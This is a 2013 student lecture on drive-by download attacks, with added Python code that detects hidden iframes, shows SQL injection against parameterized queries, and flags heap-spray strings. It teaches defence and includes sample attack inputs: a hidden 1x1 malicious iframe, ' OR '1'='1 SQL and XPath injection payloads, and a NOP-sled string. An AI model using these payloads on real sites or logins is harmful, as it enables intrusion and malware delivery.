Drive-By Downloads
Presenter: Darakhshan Naz
Teacher: Professor Dr. Muhammad Mubashir Khan
04.05.2013
Agenda
- Introduction
- Mechanisms of Drive-by Download
- General Detection Approach
- Security Measures
- Assessment & Conclusion
What is Drive-by Download?
- A technique that involves
  - Intended downloads made without understanding the consequences, e.g. executables
  - Unintended downloads, e.g. viruses, spyware
- Can happen by:
  - Visiting a website
  - Viewing an email message
- Installs a malicious program, termed malware
  - Through the malware, the attacker gets full or partial control of the victim's system
Example - Scenario: Drive-By Download!
[Figure: attack sequence between Attacker, User and User's browser. Steps as labelled in the figure:]
(1) Open browser
(2) Read email; it contains a website link
(3) Attract the user's interest; the user clicks; the website has many links
(4) Go to website
(5) Surf every site but get bored (no interest develops); close website
(6) Attacker sends the user a spoofed email
(7) Attacker sends malicious code to the user's browser and exploits a vulnerability
(8) Malicious code creates a connection between user and attacker
(9) Download and install the attacker's backdoor program
(10) Steal all the user's important files and compromise the user over the network
The user is completely unaware of the attack.
Source of concept: Report "Defence against Drive-by Download", National Security Agency, US
Purpose of Drive-by Download
- Provide a gateway to botnets.
- Take advantage of vulnerabilities.
- Steal the user's personal or confidential information.
- Lead or redirect the user to other malicious websites and compromise them.
Mechanisms of Drive-by Download
[Figure: Basic Concept of Drive-by Download Attack, steps 1-4 grouped into Injection and Exploitation (source not given on the slide)]
Injection
- What is Injection:
  - The act of entering data into an application, bypassing its security controls, so that its behaviour changes in an unexpected way.
- Reason for Injection:
  - Existence of vulnerabilities.
- A Drive-by Download begins with the injection of malicious code into a database, application or server.
- Ways of malicious code injection:
  - Injection through iFrames
  - SQL Injection
  - XPath Injection
How and where to inject?
[Figure: injection points labelled SQL Injection, XPath Injection, Injection through iFrames, and malware placed directly on the web server. Source: http://www.malware-info.com/mal_faq_inject.html]
Injection through iFrames
- The most basic form of injected code is a malicious iFrame such as:

  <div style="visibility: hidden; position: absolute; top: 1px;">
    <iframe id="IFRAME" name="IFRAME"
            src="http://www.example.com/page_with_malware.htm"
            scrolling="no" width="1" height="1" vspace="0" hspace="0"
            frameborder="0"></iframe>
  </div>

- This iFrame is present in the HTML of the requested web page.
- Content from the src URL renders in an invisible 1 pixel x 1 pixel window.
- Sometimes iFrames are present in an encoded form that looks like normal data. The process of encoding is known as "obfuscation".
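The slide describes the two properties a defender can key on: the frame is tiny (1x1) and it sits inside a hidden container. The scanner below is an added example written for this page, not code from the slides or from any of the cited papers. It uses only the Python standard library; the sample page and its URLs are constructed for the demo, with the malicious iFrame copied from the slide.

```python
"""Flag hidden 1x1 iframes of the kind shown on the slide.

Added example (not from the original slides). Two independent signals are
checked for every <iframe>: (a) width and height both <= 1, and (b) the
frame sits inside an element (or is itself) styled visibility:hidden or
display:none. Either alone is reported; both together is the classic
drive-by pattern. The SAMPLE page below is constructed for the demo.
"""
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
VOID_TAGS = {"br", "img", "input", "meta", "link", "hr"}   # never closed


def _tiny(value):
    """True if a width/height attribute is 0 or 1 (bare number or px)."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", str(value))
    return bool(m) and int(m.group(1)) <= 1


class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden_depth = 0   # > 0 while inside a hidden container
        self.stack = []         # open tags as (tag, contributes_hidden)
        self.findings = []      # (src, reason)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = bool(HIDDEN_STYLE.search(a.get("style") or ""))
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("1x1")
            if self.hidden_depth or hidden:
                reasons.append("hidden container")
            if reasons:
                self.findings.append((a.get("src", ""), ", ".join(reasons)))
        if tag not in VOID_TAGS:
            self.stack.append((tag, hidden))
            if hidden:
                self.hidden_depth += 1

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates sloppy markup.
        while self.stack:
            t, hidden = self.stack.pop()
            if hidden:
                self.hidden_depth -= 1
            if t == tag:
                break


def find_hidden_iframes(html):
    """Return [(src, reason), ...] for every suspicious iframe in html."""
    p = HiddenIframeFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: the slide's iFrame plus a legitimate, visible one.
SAMPLE = """<html><body>
<p>Welcome</p>
<div style="visibility: hidden; position: absolute; top: 1px;">
<iframe id="IFRAME" name="IFRAME" src="http://www.example.com/page_with_malware.htm"
 scrolling="no" width="1" height="1" vspace="0" hspace="0" frameborder="0"></iframe>
</div>
<iframe src="http://www.example.com/video" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE):
        print(f"suspicious iframe {src!r}: {why}")
```

Only the slide's iFrame is reported (both signals fire); the 640x360 frame is left alone. An iFrame written out by obfuscated JavaScript, as the slide's last bullet mentions, never appears in the static HTML, so this check has to be run on the DOM after scripts execute, or paired with a script decoder.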
SQL Injection
- Bypasses the authentication process.
- Gives a malicious user or attacker access to data.
- Example: in a login form, enter
    Username: ' OR '1'='1    and    Password: ' OR '1'='1
  The web page then executes this query:

    SELECT * FROM Users
    WHERE Username='' OR '1'='1' AND Password='' OR '1'='1'

- The WHERE clause is always true: the OR '1'='1' terms hold for every row.
- Authentication succeeds and the attacker can get access to any account in the database.
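The query on the slide comes from concatenating the form fields into SQL text. The following added example (not from the slides) builds the same Users table in an in-memory SQLite database, runs the slide's payload through a concatenated query and through a parameterized one, and returns both results so the difference can be checked. Table and column names follow the slide; the rows and passwords are constructed, and plaintext passwords are kept only to mirror the slide's query.

```python
"""Login check against the slide's Users table: vulnerable vs. parameterized.

Added example, not from the original slides. Sample rows are constructed.
"""
import sqlite3


def make_db():
    """In-memory database with the slide's Users(Username, Password) table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con


def login_vulnerable(con, username, password):
    """Builds the query by string concatenation: user input becomes SQL.
    Returns (sql_text, matching_rows) so the injected query can be inspected."""
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return sql, con.execute(sql).fetchall()


def login_safe(con, username, password):
    """Bound parameters: the driver sends values separately from the query
    text, so quotes in the input can never change the WHERE clause."""
    return con.execute(
        "SELECT * FROM Users WHERE Username=? AND Password=?",
        (username, password)).fetchall()


PAYLOAD = "' OR '1'='1"   # the slide's input, quotes made explicit

if __name__ == "__main__":
    con = make_db()
    sql, rows = login_vulnerable(con, PAYLOAD, PAYLOAD)
    print(sql)                                   # the slide's always-true query
    print(len(rows), "rows returned (every user)")
    print(len(login_safe(con, PAYLOAD, PAYLOAD)), "rows with bound parameters")
```

Because AND binds tighter than OR, the injected clause parses as Username='' OR ('1'='1' AND Password='') OR '1'='1', which is true for every row; the concatenated version therefore returns both users while the parameterized version returns none, since no account is literally named ' OR '1'='1. The same fix, passing data as parameters rather than splicing it into the query language, is what closes the XPath variant on the next slide.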
XPath Injection
- Almost the same as SQL Injection; now the target is an XML document.
- The insecurity is caused by injecting XPath query fragments or conditions through the web page.
- Example:
  - If a user has an account on a site with Username = John and Password = test123, then normally he sees only his own account.
  - If the same user enters his username as John' or '1'='1 with the same password, the system authenticates him and returns the entire XML document to him.
Mechanism of Drive-by Download
[Figure repeated: Basic Concept of Drive-by Download Attack, steps 1-4 grouped into Injection and Exploitation; the following slides cover Exploitation]
Exploitation
- What is Exploitation:
  - The act by which an attacker, having gained full or partial control, performs activities on the victim's system at will.
- Reason for Exploitation:
  - Users ignore updates for installed applications.
  - According to Secunia PSI, about 95.46% of users have one or more insecure applications.
  - A newer version may correct one or more vulnerabilities in the installed application.
- Vulnerabilities that are mostly exploited:
  - Browser vulnerabilities
  - Plugin vulnerabilities
  - File format vulnerabilities
Types of Vulnerabilities
- Browser vulnerability
  - The attacker injects malicious code into the user's browser and changes its settings without the user's knowledge.
- Plugin vulnerability
  - Plugins are provided by third parties and can be vulnerable; typical flaws are buffer overflows, memory corruption and pointer overwrites.
- File format vulnerability
  - Attackers embed malware in Word, Excel or PDF files distributed through email or websites. The exploit fires when the viewing or editing program opens the file.
Contd.
- Detection of these strings can be done in two ways:
  - Tracking string variables whenever they are created.
  - For automated detection, the libemu library is used. It starts disassembling at each character offset and, when it finds a sequence of valid instructions, reports shellcode.
Step 4: Investigation of Exploitation
- Exploitation is the last step of a Drive-by Download attack; it takes advantage of vulnerabilities.
- It can be detected in two ways:
  - Analysis of the behaviour of browsers and plug-ins.
  - Monitoring of strings passed as parameters and of method calls. Exploits usually use long strings, and certain methods are called when malware is downloaded.
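The two detection slides above (shellcode strings, and long strings passed as method parameters) describe checks that can be applied to every string argument a page hands to a plugin or script method. The example below is added for this page and is not libemu, nor code from the slides: libemu finds shellcode by emulating x86 and reporting a run of valid instructions, whereas this stand-in implements the cheaper signals the slides name, an unusually long argument and the long run of a single padding byte (an x86 NOP sled or heap-spray filler) that typically precedes shellcode. The method names, thresholds and sample strings are constructed; the %uXXXX form is the escaped-string notation exploit pages commonly pass through unescape().

```python
"""Heuristic scan of string arguments passed to plugin/script methods.

Added example, not from the slides and not libemu. Each (method, argument)
pair is scored on two signals: argument length and the longest run of a
single byte drawn from the usual sled/spray set. Thresholds and samples
are constructed for the demo.
"""
import re

LONG_STRING = 4096      # bytes; exploit arguments dwarf normal ones
SLED_MIN = 64           # shortest single-byte run we call a sled
SLED_BYTES = {0x90, 0x0c, 0x0d, 0x0a, 0x0b}   # x86 NOP and common spray fillers
_U_ESC = re.compile(r"%u[0-9a-fA-F]{4}")
_X_ESC = re.compile(r"%[0-9a-fA-F]{2}")


def decode_js_string(s):
    """Turn a JavaScript-escaped string (%uXXXX, %XX) into the raw bytes
    unescape() would place in memory; %uXXXX is emitted little-endian."""
    out = bytearray()
    i = 0
    while i < len(s):
        if _U_ESC.match(s, i):
            v = int(s[i + 2:i + 6], 16)
            out += bytes([v & 0xFF, v >> 8])
            i += 6
        elif _X_ESC.match(s, i):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += s[i].encode("latin-1", "replace")
            i += 1
    return bytes(out)


def longest_run(data):
    """Return (byte, length) of the longest run of one repeated byte."""
    best = (None, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best


def inspect_argument(method, arg):
    """Score one (method, string argument) pair; returns a list of reasons."""
    reasons = []
    data = decode_js_string(arg)
    if len(data) >= LONG_STRING:
        reasons.append(f"{method}: {len(data)}-byte argument")
    b, run = longest_run(data)
    if run >= SLED_MIN and b in SLED_BYTES:
        reasons.append(f"{method}: {run}-byte run of 0x{b:02x} (sled/spray padding)")
    return reasons


def scan_calls(calls):
    """Run inspect_argument over observed (method, argument) pairs."""
    findings = []
    for method, arg in calls:
        findings.extend(inspect_argument(method, arg))
    return findings


# Constructed observations: one benign call, one heap-spray-style call.
SAMPLE_CALLS = [
    ("document.title", "Drive-by downloads"),
    ("plugin.setClip", "%u9090" * 2100 + "%u4141%u4242"),
]

if __name__ == "__main__":
    for line in scan_calls(SAMPLE_CALLS):
        print(line)
```

The spray-style argument trips both signals (a 4204-byte argument holding a 4200-byte run of 0x90), the benign title trips neither. Both checks are easy to evade with varied filler or shorter sprays, which is exactly why the slide pairs them with behaviour analysis and with libemu's instruction-level check.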
Security Measures
- Keep software updated.
- Install web-filtering software.
- Implement BLADE (Block All Drive-by Download Exploits).
- Proper management by network administrators.
- Users should be careful when visiting sites, especially entertainment and social sites, as they may host adversaries.
- Use reputable search engines that flag malicious results (Google, Microsoft Bing, Yahoo, AVG).
- Use a virtual machine for web browsing.
The Bad
- Can happen easily but is very hard to overcome.
- Opportunities for attack are increasing rapidly, and detection approaches cannot be validated in every case.
- A preventive approach is better for fighting these attacks, for two reasons:
  - Intensely dynamic behaviour of the attacks.
  - Complex and time-consuming detection approaches.
The Ugly
- Mostly shows unexpected behaviour.
- Because of the diversity of attack methods, it has a high ratio of victims and it is difficult to design a detection approach that covers all possibilities.
- No computing device seems to be safe from Drive-by Download.
- As Drive-by Download attacks are increasing enormously, in the near future hard drives or portable devices may also carry exploitable vulnerabilities.
References
- Lu, L., Yegneswaran, V., Porras, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections. College of Computing, Georgia Institute of Technology; SRI International. From the ACM Digital Library.
- Zhang, J., Seifert, C., Stokes, J.W., Lee, W.: ARROW: Generating Signatures to Detect Drive-By Downloads. Georgia Institute of Technology; Microsoft Bing; Microsoft Research.
- Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers. Indian Institute of Technology, Guwahati, India.
- Provos, N., Mavrommatis, P., Abu Rajab, M., Monrose, F.: All Your iFrames Point to Us. Google Inc.; Johns Hopkins University.
- Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P.M., Kruegel, C., Vigna, G.: EVILSEED: A Guided Approach to Finding Malicious Web Pages. 2012 IEEE Symposium on Security and Privacy.